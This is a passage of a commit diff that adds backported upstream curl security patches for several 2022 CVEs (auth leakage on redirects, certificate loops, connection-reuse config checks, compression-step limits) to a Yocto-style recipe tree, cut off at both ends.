+index ec669b971dc3..8948b53fa500 100644
+--- a/lib/conncache.c
++++ b/lib/conncache.c
+@@ -156,8 +156,12 @@
+ /* report back which name we used */
+ *hostp = hostname;
+
+- /* put the number first so that the hostname gets cut off if too long */
+- msnprintf(buf, len, "%ld%s", port, hostname);
++ /* put the numbers first so that the hostname gets cut off if too long */
++#ifdef ENABLE_IPV6
++ msnprintf(buf, len, "%u/%ld/%s", conn->scope_id, port, hostname);
++#else
++ msnprintf(buf, len, "%ld/%s", port, hostname);
++#endif
+ }
+
+ /* Returns number of connections currently held in the connection cache.
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27776.patch b/meta/recipes-support/curl/curl/CVE-2022-27776.patch
new file mode 100644
index 0000000000..1a13df2d95
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27776.patch
@@ -0,0 +1,114 @@
+From 6e659993952aa5f90f48864be84a1bbb047fc258 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 13:05:40 +0200
+Subject: [PATCH] http: avoid auth/cookie on redirects same host diff port
+
+CVE-2022-27776
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2022-27776.html
+Closes #8749
+---
+ lib/http.c | 34 ++++++++++++++++++++++------------
+ lib/urldata.h | 16 +++++++++-------
+ 2 files changed, 31 insertions(+), 19 deletions(-)
+
+CVE: CVE-2022-27776
+Upstream-Status: Backport [https://github.com/curl/curl/commit/6e659993952aa5f90f48864be84a1bbb047fc258.patch]
+Comment: Refreshed patch
+Signed-off-by: Sana.Kazi <Sana.Kazi@kpit.com>
+
+diff --git a/lib/http.c b/lib/http.c
+index ce79fc4e31c8..f0476f3b9272 100644
+--- a/lib/http.c
++++ b/lib/http.c
+@@ -731,6 +731,21 @@
+ return CURLE_OK;
+ }
+
++/*
++ * allow_auth_to_host() tells if autentication, cookies or other "sensitive
++ * data" can (still) be sent to this host.
++ */
++static bool allow_auth_to_host(struct Curl_easy *data)
++{
++ struct connectdata *conn = data->conn;
++ return (!data->state.this_is_a_follow ||
++ data->set.allow_auth_to_other_hosts ||
++ (data->state.first_host &&
++ strcasecompare(data->state.first_host, conn->host.name) &&
++ (data->state.first_remote_port == conn->remote_port) &&
++ (data->state.first_remote_protocol == conn->handler->protocol)));
++}
++
+ /**
+ * Curl_http_output_auth() setups the authentication headers for the
+ * host/proxy and the correct authentication
+@@ -799,15 +799,12 @@
+ with it */
+ authproxy->done = TRUE;
+
+- /* To prevent the user+password to get sent to other than the original
+- host due to a location-follow, we do some weirdo checks here */
+- if(!data->state.this_is_a_follow ||
+- conn->bits.netrc ||
+- !data->state.first_host ||
+- data->set.allow_auth_to_other_hosts ||
+- strcasecompare(data->state.first_host, conn->host.name)) {
++ /* To prevent the user+password to get sent to other than the original host
++ due to a location-follow */
++ if(allow_auth_to_host(data)
++ || conn->bits.netrc
++ )
+ result = output_auth_headers(conn, authhost, request, path, FALSE);
+- }
+ else
+ authhost->done = TRUE;
+
+@@ -1879,10 +1891,7 @@
+ checkprefix("Cookie:", compare)) &&
+ /* be careful of sending this potentially sensitive header to
+ other hosts */
+- (data->state.this_is_a_follow &&
+- data->state.first_host &&
+- !data->set.allow_auth_to_other_hosts &&
+- !strcasecompare(data->state.first_host, conn->host.name)))
++ !allow_auth_to_host(data))
+ ;
+ else {
+ result = Curl_add_bufferf(&req_buffer, "%s\r\n", compare);
+@@ -2065,6 +2074,7 @@
+ return CURLE_OUT_OF_MEMORY;
+
+ data->state.first_remote_port = conn->remote_port;
++ data->state.first_remote_protocol = conn->handler->protocol;
+ }
+
+ if((conn->handler->protocol&(PROTO_FAMILY_HTTP|CURLPROTO_FTP)) &&
+diff --git a/lib/urldata.h b/lib/urldata.h
+index 1d89b8d7fa68..ef2174d9e727 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1342,13 +1342,15 @@
+ char *ulbuf; /* allocated upload buffer or NULL */
+ curl_off_t current_speed; /* the ProgressShow() function sets this,
+ bytes / second */
+- char *first_host; /* host name of the first (not followed) request.
+- if set, this should be the host name that we will
+- sent authorization to, no else. Used to make Location:
+- following not keep sending user+password... This is
+- strdup() data.
+- */
+- int first_remote_port; /* remote port of the first (not followed) request */
++
++ /* host name, port number and protocol of the first (not followed) request.
++ if set, this should be the host name that we will sent authorization to,
++ no else. Used to make Location: following not keep sending user+password.
++ This is strdup()ed data. */
++ char *first_host;
++ int first_remote_port;
++ unsigned int first_remote_protocol;
++
+ struct curl_ssl_session *session; /* array of 'max_ssl_sessions' size */
+ long sessionage; /* number of the most recent session */
+ unsigned int tempcount; /* number of entries in use in tempwrite, 0 - 3 */
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27781.patch b/meta/recipes-support/curl/curl/CVE-2022-27781.patch
new file mode 100644
index 0000000000..ea1bc22928
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27781.patch
@@ -0,0 +1,46 @@
+From 7a1f183039a6a6c9099a114f5e5c94777413c767 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 9 May 2022 10:07:15 +0200
+Subject: [PATCH] nss: return error if seemingly stuck in a cert loop
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+CVE-2022-27781
+
+Reported-by: Florian Kohnhäuser
+Bug: https://curl.se/docs/CVE-2022-27781.html
+Closes #8822
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/5c7da89d404bf59c8dd82a001119a16d18365917]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/vtls/nss.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/lib/vtls/nss.c b/lib/vtls/nss.c
+index 375c78b..86102f7 100644
+--- a/lib/vtls/nss.c
++++ b/lib/vtls/nss.c
+@@ -950,6 +950,9 @@ static void display_cert_info(struct Curl_easy *data,
+ PR_Free(common_name);
+ }
+
++/* A number of certs that will never occur in a real server handshake */
++#define TOO_MANY_CERTS 300
++
+ static CURLcode display_conn_info(struct connectdata *conn, PRFileDesc *sock)
+ {
+ CURLcode result = CURLE_OK;
+@@ -986,6 +989,11 @@ static CURLcode display_conn_info(struct connectdata *conn, PRFileDesc *sock)
+ cert2 = CERT_FindCertIssuer(cert, now, certUsageSSLCA);
+ while(cert2) {
+ i++;
++ if(i >= TOO_MANY_CERTS) {
++ CERT_DestroyCertificate(cert2);
++ failf(data, "certificate loop");
++ return CURLE_SSL_CERTPROBLEM;
++ }
+ if(cert2->isRoot) {
+ CERT_DestroyCertificate(cert2);
+ break;
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27782-1.patch b/meta/recipes-support/curl/curl/CVE-2022-27782-1.patch
new file mode 100644
index 0000000000..6b6d0e1938
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27782-1.patch
@@ -0,0 +1,363 @@
+From 907a16c832d9ce0ffa7e9b2297548063095a7242 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 9 May 2022 23:13:53 +0200
+Subject: [PATCH] tls: check more TLS details for connection reuse
+
+CVE-2022-27782
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2022-27782.html
+Closes #8825
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/f18af4f874cecab82a9797e8c7541e0990c7a64c]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/setopt.c | 29 +++++++++++++++++------------
+ lib/url.c | 17 ++++++++++-------
+ lib/urldata.h | 13 +++++++------
+ lib/vtls/gtls.c | 30 ++++++++++++++++--------------
+ lib/vtls/mbedtls.c | 2 +-
+ lib/vtls/nss.c | 6 +++---
+ lib/vtls/openssl.c | 10 +++++-----
+ lib/vtls/vtls.c | 1 +
+ 8 files changed, 60 insertions(+), 48 deletions(-)
+
+diff --git a/lib/setopt.c b/lib/setopt.c
+index 4648c87..bebb2e4 100644
+--- a/lib/setopt.c
++++ b/lib/setopt.c
+@@ -2130,6 +2130,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+
+ case CURLOPT_SSL_OPTIONS:
+ arg = va_arg(param, long);
++ data->set.ssl.primary.ssl_options = (unsigned char)(arg & 0xff);
+ data->set.ssl.enable_beast =
+ (bool)((arg&CURLSSLOPT_ALLOW_BEAST) ? TRUE : FALSE);
+ data->set.ssl.no_revoke = !!(arg & CURLSSLOPT_NO_REVOKE);
+@@ -2139,6 +2140,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+ #ifndef CURL_DISABLE_PROXY
+ case CURLOPT_PROXY_SSL_OPTIONS:
+ arg = va_arg(param, long);
++ data->set.proxy_ssl.primary.ssl_options = (unsigned char)(arg & 0xff);
+ data->set.proxy_ssl.enable_beast =
+ (bool)((arg&CURLSSLOPT_ALLOW_BEAST) ? TRUE : FALSE);
+ data->set.proxy_ssl.no_revoke = !!(arg & CURLSSLOPT_NO_REVOKE);
+@@ -2541,44 +2543,47 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+ case CURLOPT_TLSAUTH_USERNAME:
+ result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_USERNAME_ORIG],
+ va_arg(param, char *));
+- if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] && !data->set.ssl.authtype)
+- data->set.ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
++ if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] &&
++ !data->set.ssl.primary.authtype)
++ data->set.ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
+ break;
+ case CURLOPT_PROXY_TLSAUTH_USERNAME:
+ result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_USERNAME_PROXY],
+ va_arg(param, char *));
+ if(data->set.str[STRING_TLSAUTH_USERNAME_PROXY] &&
+- !data->set.proxy_ssl.authtype)
+- data->set.proxy_ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
++ !data->set.proxy_ssl.primary.authtype)
++ data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default to
++ SRP */
+ break;
+ case CURLOPT_TLSAUTH_PASSWORD:
+ result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_PASSWORD_ORIG],
+ va_arg(param, char *));
+- if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] && !data->set.ssl.authtype)
+- data->set.ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
++ if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] &&
++ !data->set.ssl.primary.authtype)
++ data->set.ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
+ break;
+ case CURLOPT_PROXY_TLSAUTH_PASSWORD:
+ result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_PASSWORD_PROXY],
+ va_arg(param, char *));
+ if(data->set.str[STRING_TLSAUTH_USERNAME_PROXY] &&
+- !data->set.proxy_ssl.authtype)
+- data->set.proxy_ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
++ !data->set.proxy_ssl.primary.authtype)
++ data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default */
+ break;
+ case CURLOPT_TLSAUTH_TYPE:
+ argptr = va_arg(param, char *);
+ if(!argptr ||
+ strncasecompare(argptr, "SRP", strlen("SRP")))
+- data->set.ssl.authtype = CURL_TLSAUTH_SRP;
++ data->set.ssl.primary.authtype = CURL_TLSAUTH_SRP;
+ else
+- data->set.ssl.authtype = CURL_TLSAUTH_NONE;
++ data->set.ssl.primary.authtype = CURL_TLSAUTH_NONE;
+ break;
+ case CURLOPT_PROXY_TLSAUTH_TYPE:
+ argptr = va_arg(param, char *);
+ if(!argptr ||
+ strncasecompare(argptr, "SRP", strlen("SRP")))
+- data->set.proxy_ssl.authtype = CURL_TLSAUTH_SRP;
++ data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_SRP;
+ else
+- data->set.proxy_ssl.authtype = CURL_TLSAUTH_NONE;
++ data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_NONE;
+ break;
+ #endif
+ #ifdef USE_ARES
+diff --git a/lib/url.c b/lib/url.c
+index efa3dc7..6518be9 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -482,7 +482,7 @@ CURLcode Curl_init_userdefined(struct Curl_easy *data)
+ set->ssl.primary.verifypeer = TRUE;
+ set->ssl.primary.verifyhost = TRUE;
+ #ifdef USE_TLS_SRP
+- set->ssl.authtype = CURL_TLSAUTH_NONE;
++ set->ssl.primary.authtype = CURL_TLSAUTH_NONE;
+ #endif
+ set->ssh_auth_types = CURLSSH_AUTH_DEFAULT; /* defaults to any auth
+ type */
+@@ -3594,8 +3594,9 @@ static CURLcode create_conn(struct Curl_easy *data,
+ data->set.proxy_ssl.primary.pinned_key =
+ data->set.str[STRING_SSL_PINNEDPUBLICKEY_PROXY];
+
+- data->set.ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_ORIG];
+- data->set.proxy_ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_PROXY];
++ data->set.ssl.primary.CRLfile = data->set.str[STRING_SSL_CRLFILE_ORIG];
++ data->set.proxy_ssl.primary.CRLfile =
++ data->set.str[STRING_SSL_CRLFILE_PROXY];
+ data->set.ssl.cert = data->set.str[STRING_CERT_ORIG];
+ data->set.proxy_ssl.cert = data->set.str[STRING_CERT_PROXY];
+ data->set.ssl.cert_type = data->set.str[STRING_CERT_TYPE_ORIG];
+@@ -3609,10 +3610,12 @@ static CURLcode create_conn(struct Curl_easy *data,
+ data->set.ssl.primary.clientcert = data->set.str[STRING_CERT_ORIG];
+ data->set.proxy_ssl.primary.clientcert = data->set.str[STRING_CERT_PROXY];
+ #ifdef USE_TLS_SRP
+- data->set.ssl.username = data->set.str[STRING_TLSAUTH_USERNAME_ORIG];
+- data->set.proxy_ssl.username = data->set.str[STRING_TLSAUTH_USERNAME_PROXY];
+- data->set.ssl.password = data->set.str[STRING_TLSAUTH_PASSWORD_ORIG];
+- data->set.proxy_ssl.password = data->set.str[STRING_TLSAUTH_PASSWORD_PROXY];
++ data->set.ssl.primary.username = data->set.str[STRING_TLSAUTH_USERNAME_ORIG];
++ data->set.proxy_ssl.primary.username =
++ data->set.str[STRING_TLSAUTH_USERNAME_PROXY];
++ data->set.ssl.primary.password = data->set.str[STRING_TLSAUTH_PASSWORD_ORIG];
++ data->set.proxy_ssl.primary.password =
++ data->set.str[STRING_TLSAUTH_PASSWORD_PROXY];
+ #endif
+
+ if(!Curl_clone_primary_ssl_config(&data->set.ssl.primary,
+diff --git a/lib/urldata.h b/lib/urldata.h
+index ab1b267..ad0ef8f 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -231,6 +231,13 @@ struct ssl_primary_config {
+ char *cipher_list; /* list of ciphers to use */
+ char *cipher_list13; /* list of TLS 1.3 cipher suites to use */
+ char *pinned_key;
++ char *CRLfile; /* CRL to check certificate revocation */
++ #ifdef USE_TLS_SRP
++ char *username; /* TLS username (for, e.g., SRP) */
++ char *password; /* TLS password (for, e.g., SRP) */
++ enum CURL_TLSAUTH authtype; /* TLS authentication type (default SRP) */
++ #endif
++ unsigned char ssl_options; /* the CURLOPT_SSL_OPTIONS bitmask */
+ BIT(verifypeer); /* set TRUE if this is desired */
+ BIT(verifyhost); /* set TRUE if CN/SAN must match hostname */
+ BIT(verifystatus); /* set TRUE if certificate status must be checked */
+@@ -240,7 +247,6 @@ struct ssl_primary_config {
+ struct ssl_config_data {
+ struct ssl_primary_config primary;
+ long certverifyresult; /* result from the certificate verification */
+- char *CRLfile; /* CRL to check certificate revocation */
+ curl_ssl_ctx_callback fsslctx; /* function to initialize ssl ctx */
+ void *fsslctxp; /* parameter for call back */
+ char *cert; /* client certificate file name */
+@@ -248,11 +254,6 @@ struct ssl_config_data {
+ char *key; /* private key file name */
+ char *key_type; /* format for private key (default: PEM) */
+ char *key_passwd; /* plain text private key password */
+-#ifdef USE_TLS_SRP
+- char *username; /* TLS username (for, e.g., SRP) */
+- char *password; /* TLS password (for, e.g., SRP) */
+- enum CURL_TLSAUTH authtype; /* TLS authentication type (default SRP) */
+-#endif
+ BIT(certinfo); /* gather lots of certificate info */
+ BIT(falsestart);
+ BIT(enable_beast); /* allow this flaw for interoperability's sake*/
+diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
+index 3d0758d..92c301c 100644
+--- a/lib/vtls/gtls.c
++++ b/lib/vtls/gtls.c
+@@ -581,9 +581,10 @@ gtls_connect_step1(struct connectdata *conn,
+ }
+
+ #ifdef USE_TLS_SRP
+- if((SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) &&
++ if((SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP) &&
+ Curl_allow_auth_to_host(data)) {
+- infof(data, "Using TLS-SRP username: %s\n", SSL_SET_OPTION(username));
++ infof(data, "Using TLS-SRP username: %s\n",
++ SSL_SET_OPTION(primary.username));
+
+ rc = gnutls_srp_allocate_client_credentials(&BACKEND->srp_client_cred);
+ if(rc != GNUTLS_E_SUCCESS) {
+@@ -593,8 +594,8 @@ gtls_connect_step1(struct connectdata *conn,
+ }
+
+ rc = gnutls_srp_set_client_credentials(BACKEND->srp_client_cred,
+- SSL_SET_OPTION(username),
+- SSL_SET_OPTION(password));
++ SSL_SET_OPTION(primary.username),
++ SSL_SET_OPTION(primary.password));
+ if(rc != GNUTLS_E_SUCCESS) {
+ failf(data, "gnutls_srp_set_client_cred() failed: %s",
+ gnutls_strerror(rc));
+@@ -648,19 +649,19 @@ gtls_connect_step1(struct connectdata *conn,
+ }
+ #endif
+
+- if(SSL_SET_OPTION(CRLfile)) {
++ if(SSL_SET_OPTION(primary.CRLfile)) {
+ /* set the CRL list file */
+ rc = gnutls_certificate_set_x509_crl_file(BACKEND->cred,
+- SSL_SET_OPTION(CRLfile),
++ SSL_SET_OPTION(primary.CRLfile),
+ GNUTLS_X509_FMT_PEM);
+ if(rc < 0) {
+ failf(data, "error reading crl file %s (%s)",
+- SSL_SET_OPTION(CRLfile), gnutls_strerror(rc));
++ SSL_SET_OPTION(primary.CRLfile), gnutls_strerror(rc));
+ return CURLE_SSL_CRL_BADFILE;
+ }
+ else
+ infof(data, "found %d CRL in %s\n",
+- rc, SSL_SET_OPTION(CRLfile));
++ rc, SSL_SET_OPTION(primary.CRLfile));
+ }
+
+ /* Initialize TLS session as a client */
+@@ -879,7 +880,7 @@ gtls_connect_step1(struct connectdata *conn,
+
+ #ifdef USE_TLS_SRP
+ /* put the credentials to the current session */
+- if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) {
++ if(SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP) {
+ rc = gnutls_credentials_set(session, GNUTLS_CRD_SRP,
+ BACKEND->srp_client_cred);
+ if(rc != GNUTLS_E_SUCCESS) {
+@@ -1061,8 +1062,8 @@ gtls_connect_step3(struct connectdata *conn,
+ SSL_CONN_CONFIG(verifyhost) ||
+ SSL_CONN_CONFIG(issuercert)) {
+ #ifdef USE_TLS_SRP
+- if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP
+- && SSL_SET_OPTION(username) != NULL
++ if(SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP
++ && SSL_SET_OPTION(primary.username) != NULL
+ && !SSL_CONN_CONFIG(verifypeer)
+ && gnutls_cipher_get(session)) {
+ /* no peer cert, but auth is ok if we have SRP user and cipher and no
+@@ -1116,7 +1117,8 @@ gtls_connect_step3(struct connectdata *conn,
+ failf(data, "server certificate verification failed. CAfile: %s "
+ "CRLfile: %s", SSL_CONN_CONFIG(CAfile) ? SSL_CONN_CONFIG(CAfile):
+ "none",
+- SSL_SET_OPTION(CRLfile)?SSL_SET_OPTION(CRLfile):"none");
++ SSL_SET_OPTION(primary.CRLfile) ?
++ SSL_SET_OPTION(primary.CRLfile) : "none");
+ return CURLE_PEER_FAILED_VERIFICATION;
+ }
+ else
+@@ -1703,8 +1705,8 @@ static int Curl_gtls_shutdown(struct connectdata *conn, int sockindex)
+ gnutls_certificate_free_credentials(BACKEND->cred);
+
+ #ifdef USE_TLS_SRP
+- if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP
+- && SSL_SET_OPTION(username) != NULL)
++ if(SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP
++ && SSL_SET_OPTION(primary.username) != NULL)
+ gnutls_srp_free_client_credentials(BACKEND->srp_client_cred);
+ #endif
+
+diff --git a/lib/vtls/mbedtls.c b/lib/vtls/mbedtls.c
+index 19df847..62d2b00 100644
+--- a/lib/vtls/mbedtls.c
++++ b/lib/vtls/mbedtls.c
+@@ -245,7 +245,7 @@ mbed_connect_step1(struct connectdata *conn,
+ const bool verifypeer = SSL_CONN_CONFIG(verifypeer);
+ const char * const ssl_capath = SSL_CONN_CONFIG(CApath);
+ char * const ssl_cert = SSL_SET_OPTION(cert);
+- const char * const ssl_crlfile = SSL_SET_OPTION(CRLfile);
++ const char * const ssl_crlfile = SSL_SET_OPTION(primary.CRLfile);
+ const char * const hostname = SSL_IS_PROXY() ? conn->http_proxy.host.name :
+ conn->host.name;
+ const long int port = SSL_IS_PROXY() ? conn->port : conn->remote_port;
+diff --git a/lib/vtls/nss.c b/lib/vtls/nss.c
+index 86102f7..62fd7a2 100644
+--- a/lib/vtls/nss.c
++++ b/lib/vtls/nss.c
+@@ -1955,13 +1955,13 @@ static CURLcode nss_setup_connect(struct connectdata *conn, int sockindex)
+ }
+ }
+
+- if(SSL_SET_OPTION(CRLfile)) {
+- const CURLcode rv = nss_load_crl(SSL_SET_OPTION(CRLfile));
++ if(SSL_SET_OPTION(primary.CRLfile)) {
++ const CURLcode rv = nss_load_crl(SSL_SET_OPTION(primary.CRLfile));
+ if(rv) {
+ result = rv;
+ goto error;
+ }
+- infof(data, " CRLfile: %s\n", SSL_SET_OPTION(CRLfile));
++ infof(data, " CRLfile: %s\n", SSL_SET_OPTION(primary.CRLfile));
+ }
+
+ if(SSL_SET_OPTION(cert)) {
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index a14cecc..ec5a8f5 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -2454,14 +2454,14 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
+ &data->set.proxy_ssl.certverifyresult : &data->set.ssl.certverifyresult;
+ const long int ssl_version = SSL_CONN_CONFIG(version);
+ #ifdef USE_TLS_SRP
+- const enum CURL_TLSAUTH ssl_authtype = SSL_SET_OPTION(authtype);
++ const enum CURL_TLSAUTH ssl_authtype = SSL_SET_OPTION(primary.authtype);
+ #endif
+ char * const ssl_cert = SSL_SET_OPTION(cert);
+ const char * const ssl_cert_type = SSL_SET_OPTION(cert_type);
+ const char * const ssl_cafile = SSL_CONN_CONFIG(CAfile);
+ const char * const ssl_capath = SSL_CONN_CONFIG(CApath);
+ const bool verifypeer = SSL_CONN_CONFIG(verifypeer);
+- const char * const ssl_crlfile = SSL_SET_OPTION(CRLfile);
++ const char * const ssl_crlfile = SSL_SET_OPTION(primary.CRLfile);
+ char error_buffer[256];
+
+ DEBUGASSERT(ssl_connect_1 == connssl->connecting_state);
+@@ -2741,15 +2741,15 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
+ #ifdef USE_TLS_SRP
+ if((ssl_authtype == CURL_TLSAUTH_SRP) &&
+ Curl_allow_auth_to_host(data)) {
+- char * const ssl_username = SSL_SET_OPTION(username);
+-
++ char * const ssl_username = SSL_SET_OPTION(primary.username);
++ char * const ssl_password = SSL_SET_OPTION(primary.password);
+ infof(data, "Using TLS-SRP username: %s\n", ssl_username);
+
+ if(!SSL_CTX_set_srp_username(BACKEND->ctx, ssl_username)) {
+ failf(data, "Unable to set SRP user name");
+ return CURLE_BAD_FUNCTION_ARGUMENT;
+ }
+- if(!SSL_CTX_set_srp_password(BACKEND->ctx, SSL_SET_OPTION(password))) {
++ if(!SSL_CTX_set_srp_password(BACKEND->ctx, ssl_password)) {
+ failf(data, "failed setting SRP password");
+ return CURLE_BAD_FUNCTION_ARGUMENT;
+ }
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index e38f74e..e8cb70f 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -89,6 +89,7 @@ Curl_ssl_config_matches(struct ssl_primary_config* data,
+ {
+ if((data->version == needle->version) &&
+ (data->version_max == needle->version_max) &&
++ (data->ssl_options == needle->ssl_options) &&
+ (data->verifypeer == needle->verifypeer) &&
+ (data->verifyhost == needle->verifyhost) &&
+ (data->verifystatus == needle->verifystatus) &&
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27782-2.patch b/meta/recipes-support/curl/curl/CVE-2022-27782-2.patch
new file mode 100644
index 0000000000..3d56025210
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27782-2.patch
@@ -0,0 +1,71 @@
+From 0a115a8903dffc7f723d1d4d71fb821d69eb8761 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 9 May 2022 23:13:53 +0200
+Subject: [PATCH] url: check SSH config match on connection reuse
+
+CVE-2022-27782
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2022-27782.html
+Closes #8825
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/1645e9b44505abd5cbaf65da5282c3f33b5924a5]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/url.c | 11 +++++++++++
+ lib/vssh/ssh.h | 6 +++---
+ 2 files changed, 14 insertions(+), 3 deletions(-)
+
+diff --git a/lib/url.c b/lib/url.c
+index 6518be9..8da0245 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -1027,6 +1027,12 @@ static void prune_dead_connections(struct Curl_easy *data)
+ }
+ }
+
++static bool ssh_config_matches(struct connectdata *one,
++ struct connectdata *two)
++{
++ return (Curl_safecmp(one->proto.sshc.rsa, two->proto.sshc.rsa) &&
++ Curl_safecmp(one->proto.sshc.rsa_pub, two->proto.sshc.rsa_pub));
++}
+ /*
+ * Given one filled in connection struct (named needle), this function should
+ * detect if there already is one that has all the significant details
+@@ -1260,6 +1266,11 @@ ConnectionExists(struct Curl_easy *data,
+ }
+ }
+
++ if(get_protocol_family(needle->handler->protocol) == PROTO_FAMILY_SSH) {
++ if(!ssh_config_matches(needle, check))
++ continue;
++ }
++
+ if(!needle->bits.httpproxy || (needle->handler->flags&PROTOPT_SSL) ||
+ needle->bits.tunnel_proxy) {
+ /* The requested connection does not use a HTTP proxy or it uses SSL or
+diff --git a/lib/vssh/ssh.h b/lib/vssh/ssh.h
+index 0d4ee52..8f2632e 100644
+--- a/lib/vssh/ssh.h
++++ b/lib/vssh/ssh.h
+@@ -7,7 +7,7 @@
+ * | (__| |_| | _ <| |___
+ * \___|\___/|_| \_\_____|
+ *
+- * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
++ * Copyright (C) 1998 - 2022, Daniel Stenberg, <daniel@haxx.se>, et al.
+ *
+ * This software is licensed as described in the file COPYING, which
+ * you should have received as part of this distribution. The terms
+@@ -120,8 +120,8 @@ struct ssh_conn {
+
+ /* common */
+ const char *passphrase; /* pass-phrase to use */
+- char *rsa_pub; /* path name */
+- char *rsa; /* path name */
++ char *rsa_pub; /* strdup'ed public key file */
++ char *rsa; /* strdup'ed private key file */
+ bool authed; /* the connection has been authenticated fine */
+ sshstate state; /* always use ssh.c:state() to change state! */
+ sshstate nextstate; /* the state to goto after stopping */
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32206.patch b/meta/recipes-support/curl/curl/CVE-2022-32206.patch
new file mode 100644
index 0000000000..3d76aeb43d
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32206.patch
@@ -0,0 +1,52 @@
+From 25e7be39be5f8ed696b6085ced9cf6c17e6128f4 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 16 May 2022 16:28:13 +0200
+Subject: [PATCH] content_encoding: return error on too many compression steps
+
+The max allowed steps is arbitrarily set to 5.
+
+Bug: https://curl.se/docs/CVE-2022-32206.html
+CVE-2022-32206
+Reported-by: Harry Sintonen
+Closes #9049
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/3a09fbb7f264c67c43]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/content_encoding.c | 9 +++++++++
+ 1 file changed, 9 insertions(+)
+
+diff --git a/lib/content_encoding.c b/lib/content_encoding.c
+index 6d47537..91e621f 100644
+--- a/lib/content_encoding.c
++++ b/lib/content_encoding.c
+@@ -934,6 +934,9 @@ static const content_encoding *find_encoding(const char *name, size_t len)
+ return NULL;
+ }
+
++/* allow no more than 5 "chained" compression steps */
++#define MAX_ENCODE_STACK 5
++
+ /* Set-up the unencoding stack from the Content-Encoding header value.
+ * See RFC 7231 section 3.1.2.2. */
+ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+@@ -941,6 +944,7 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+ {
+ struct Curl_easy *data = conn->data;
+ struct SingleRequest *k = &data->req;
++ int counter = 0;
+
+ do {
+ const char *name;
+@@ -975,6 +979,11 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+ if(!encoding)
+ encoding = &error_encoding; /* Defer error at stack use. */
+
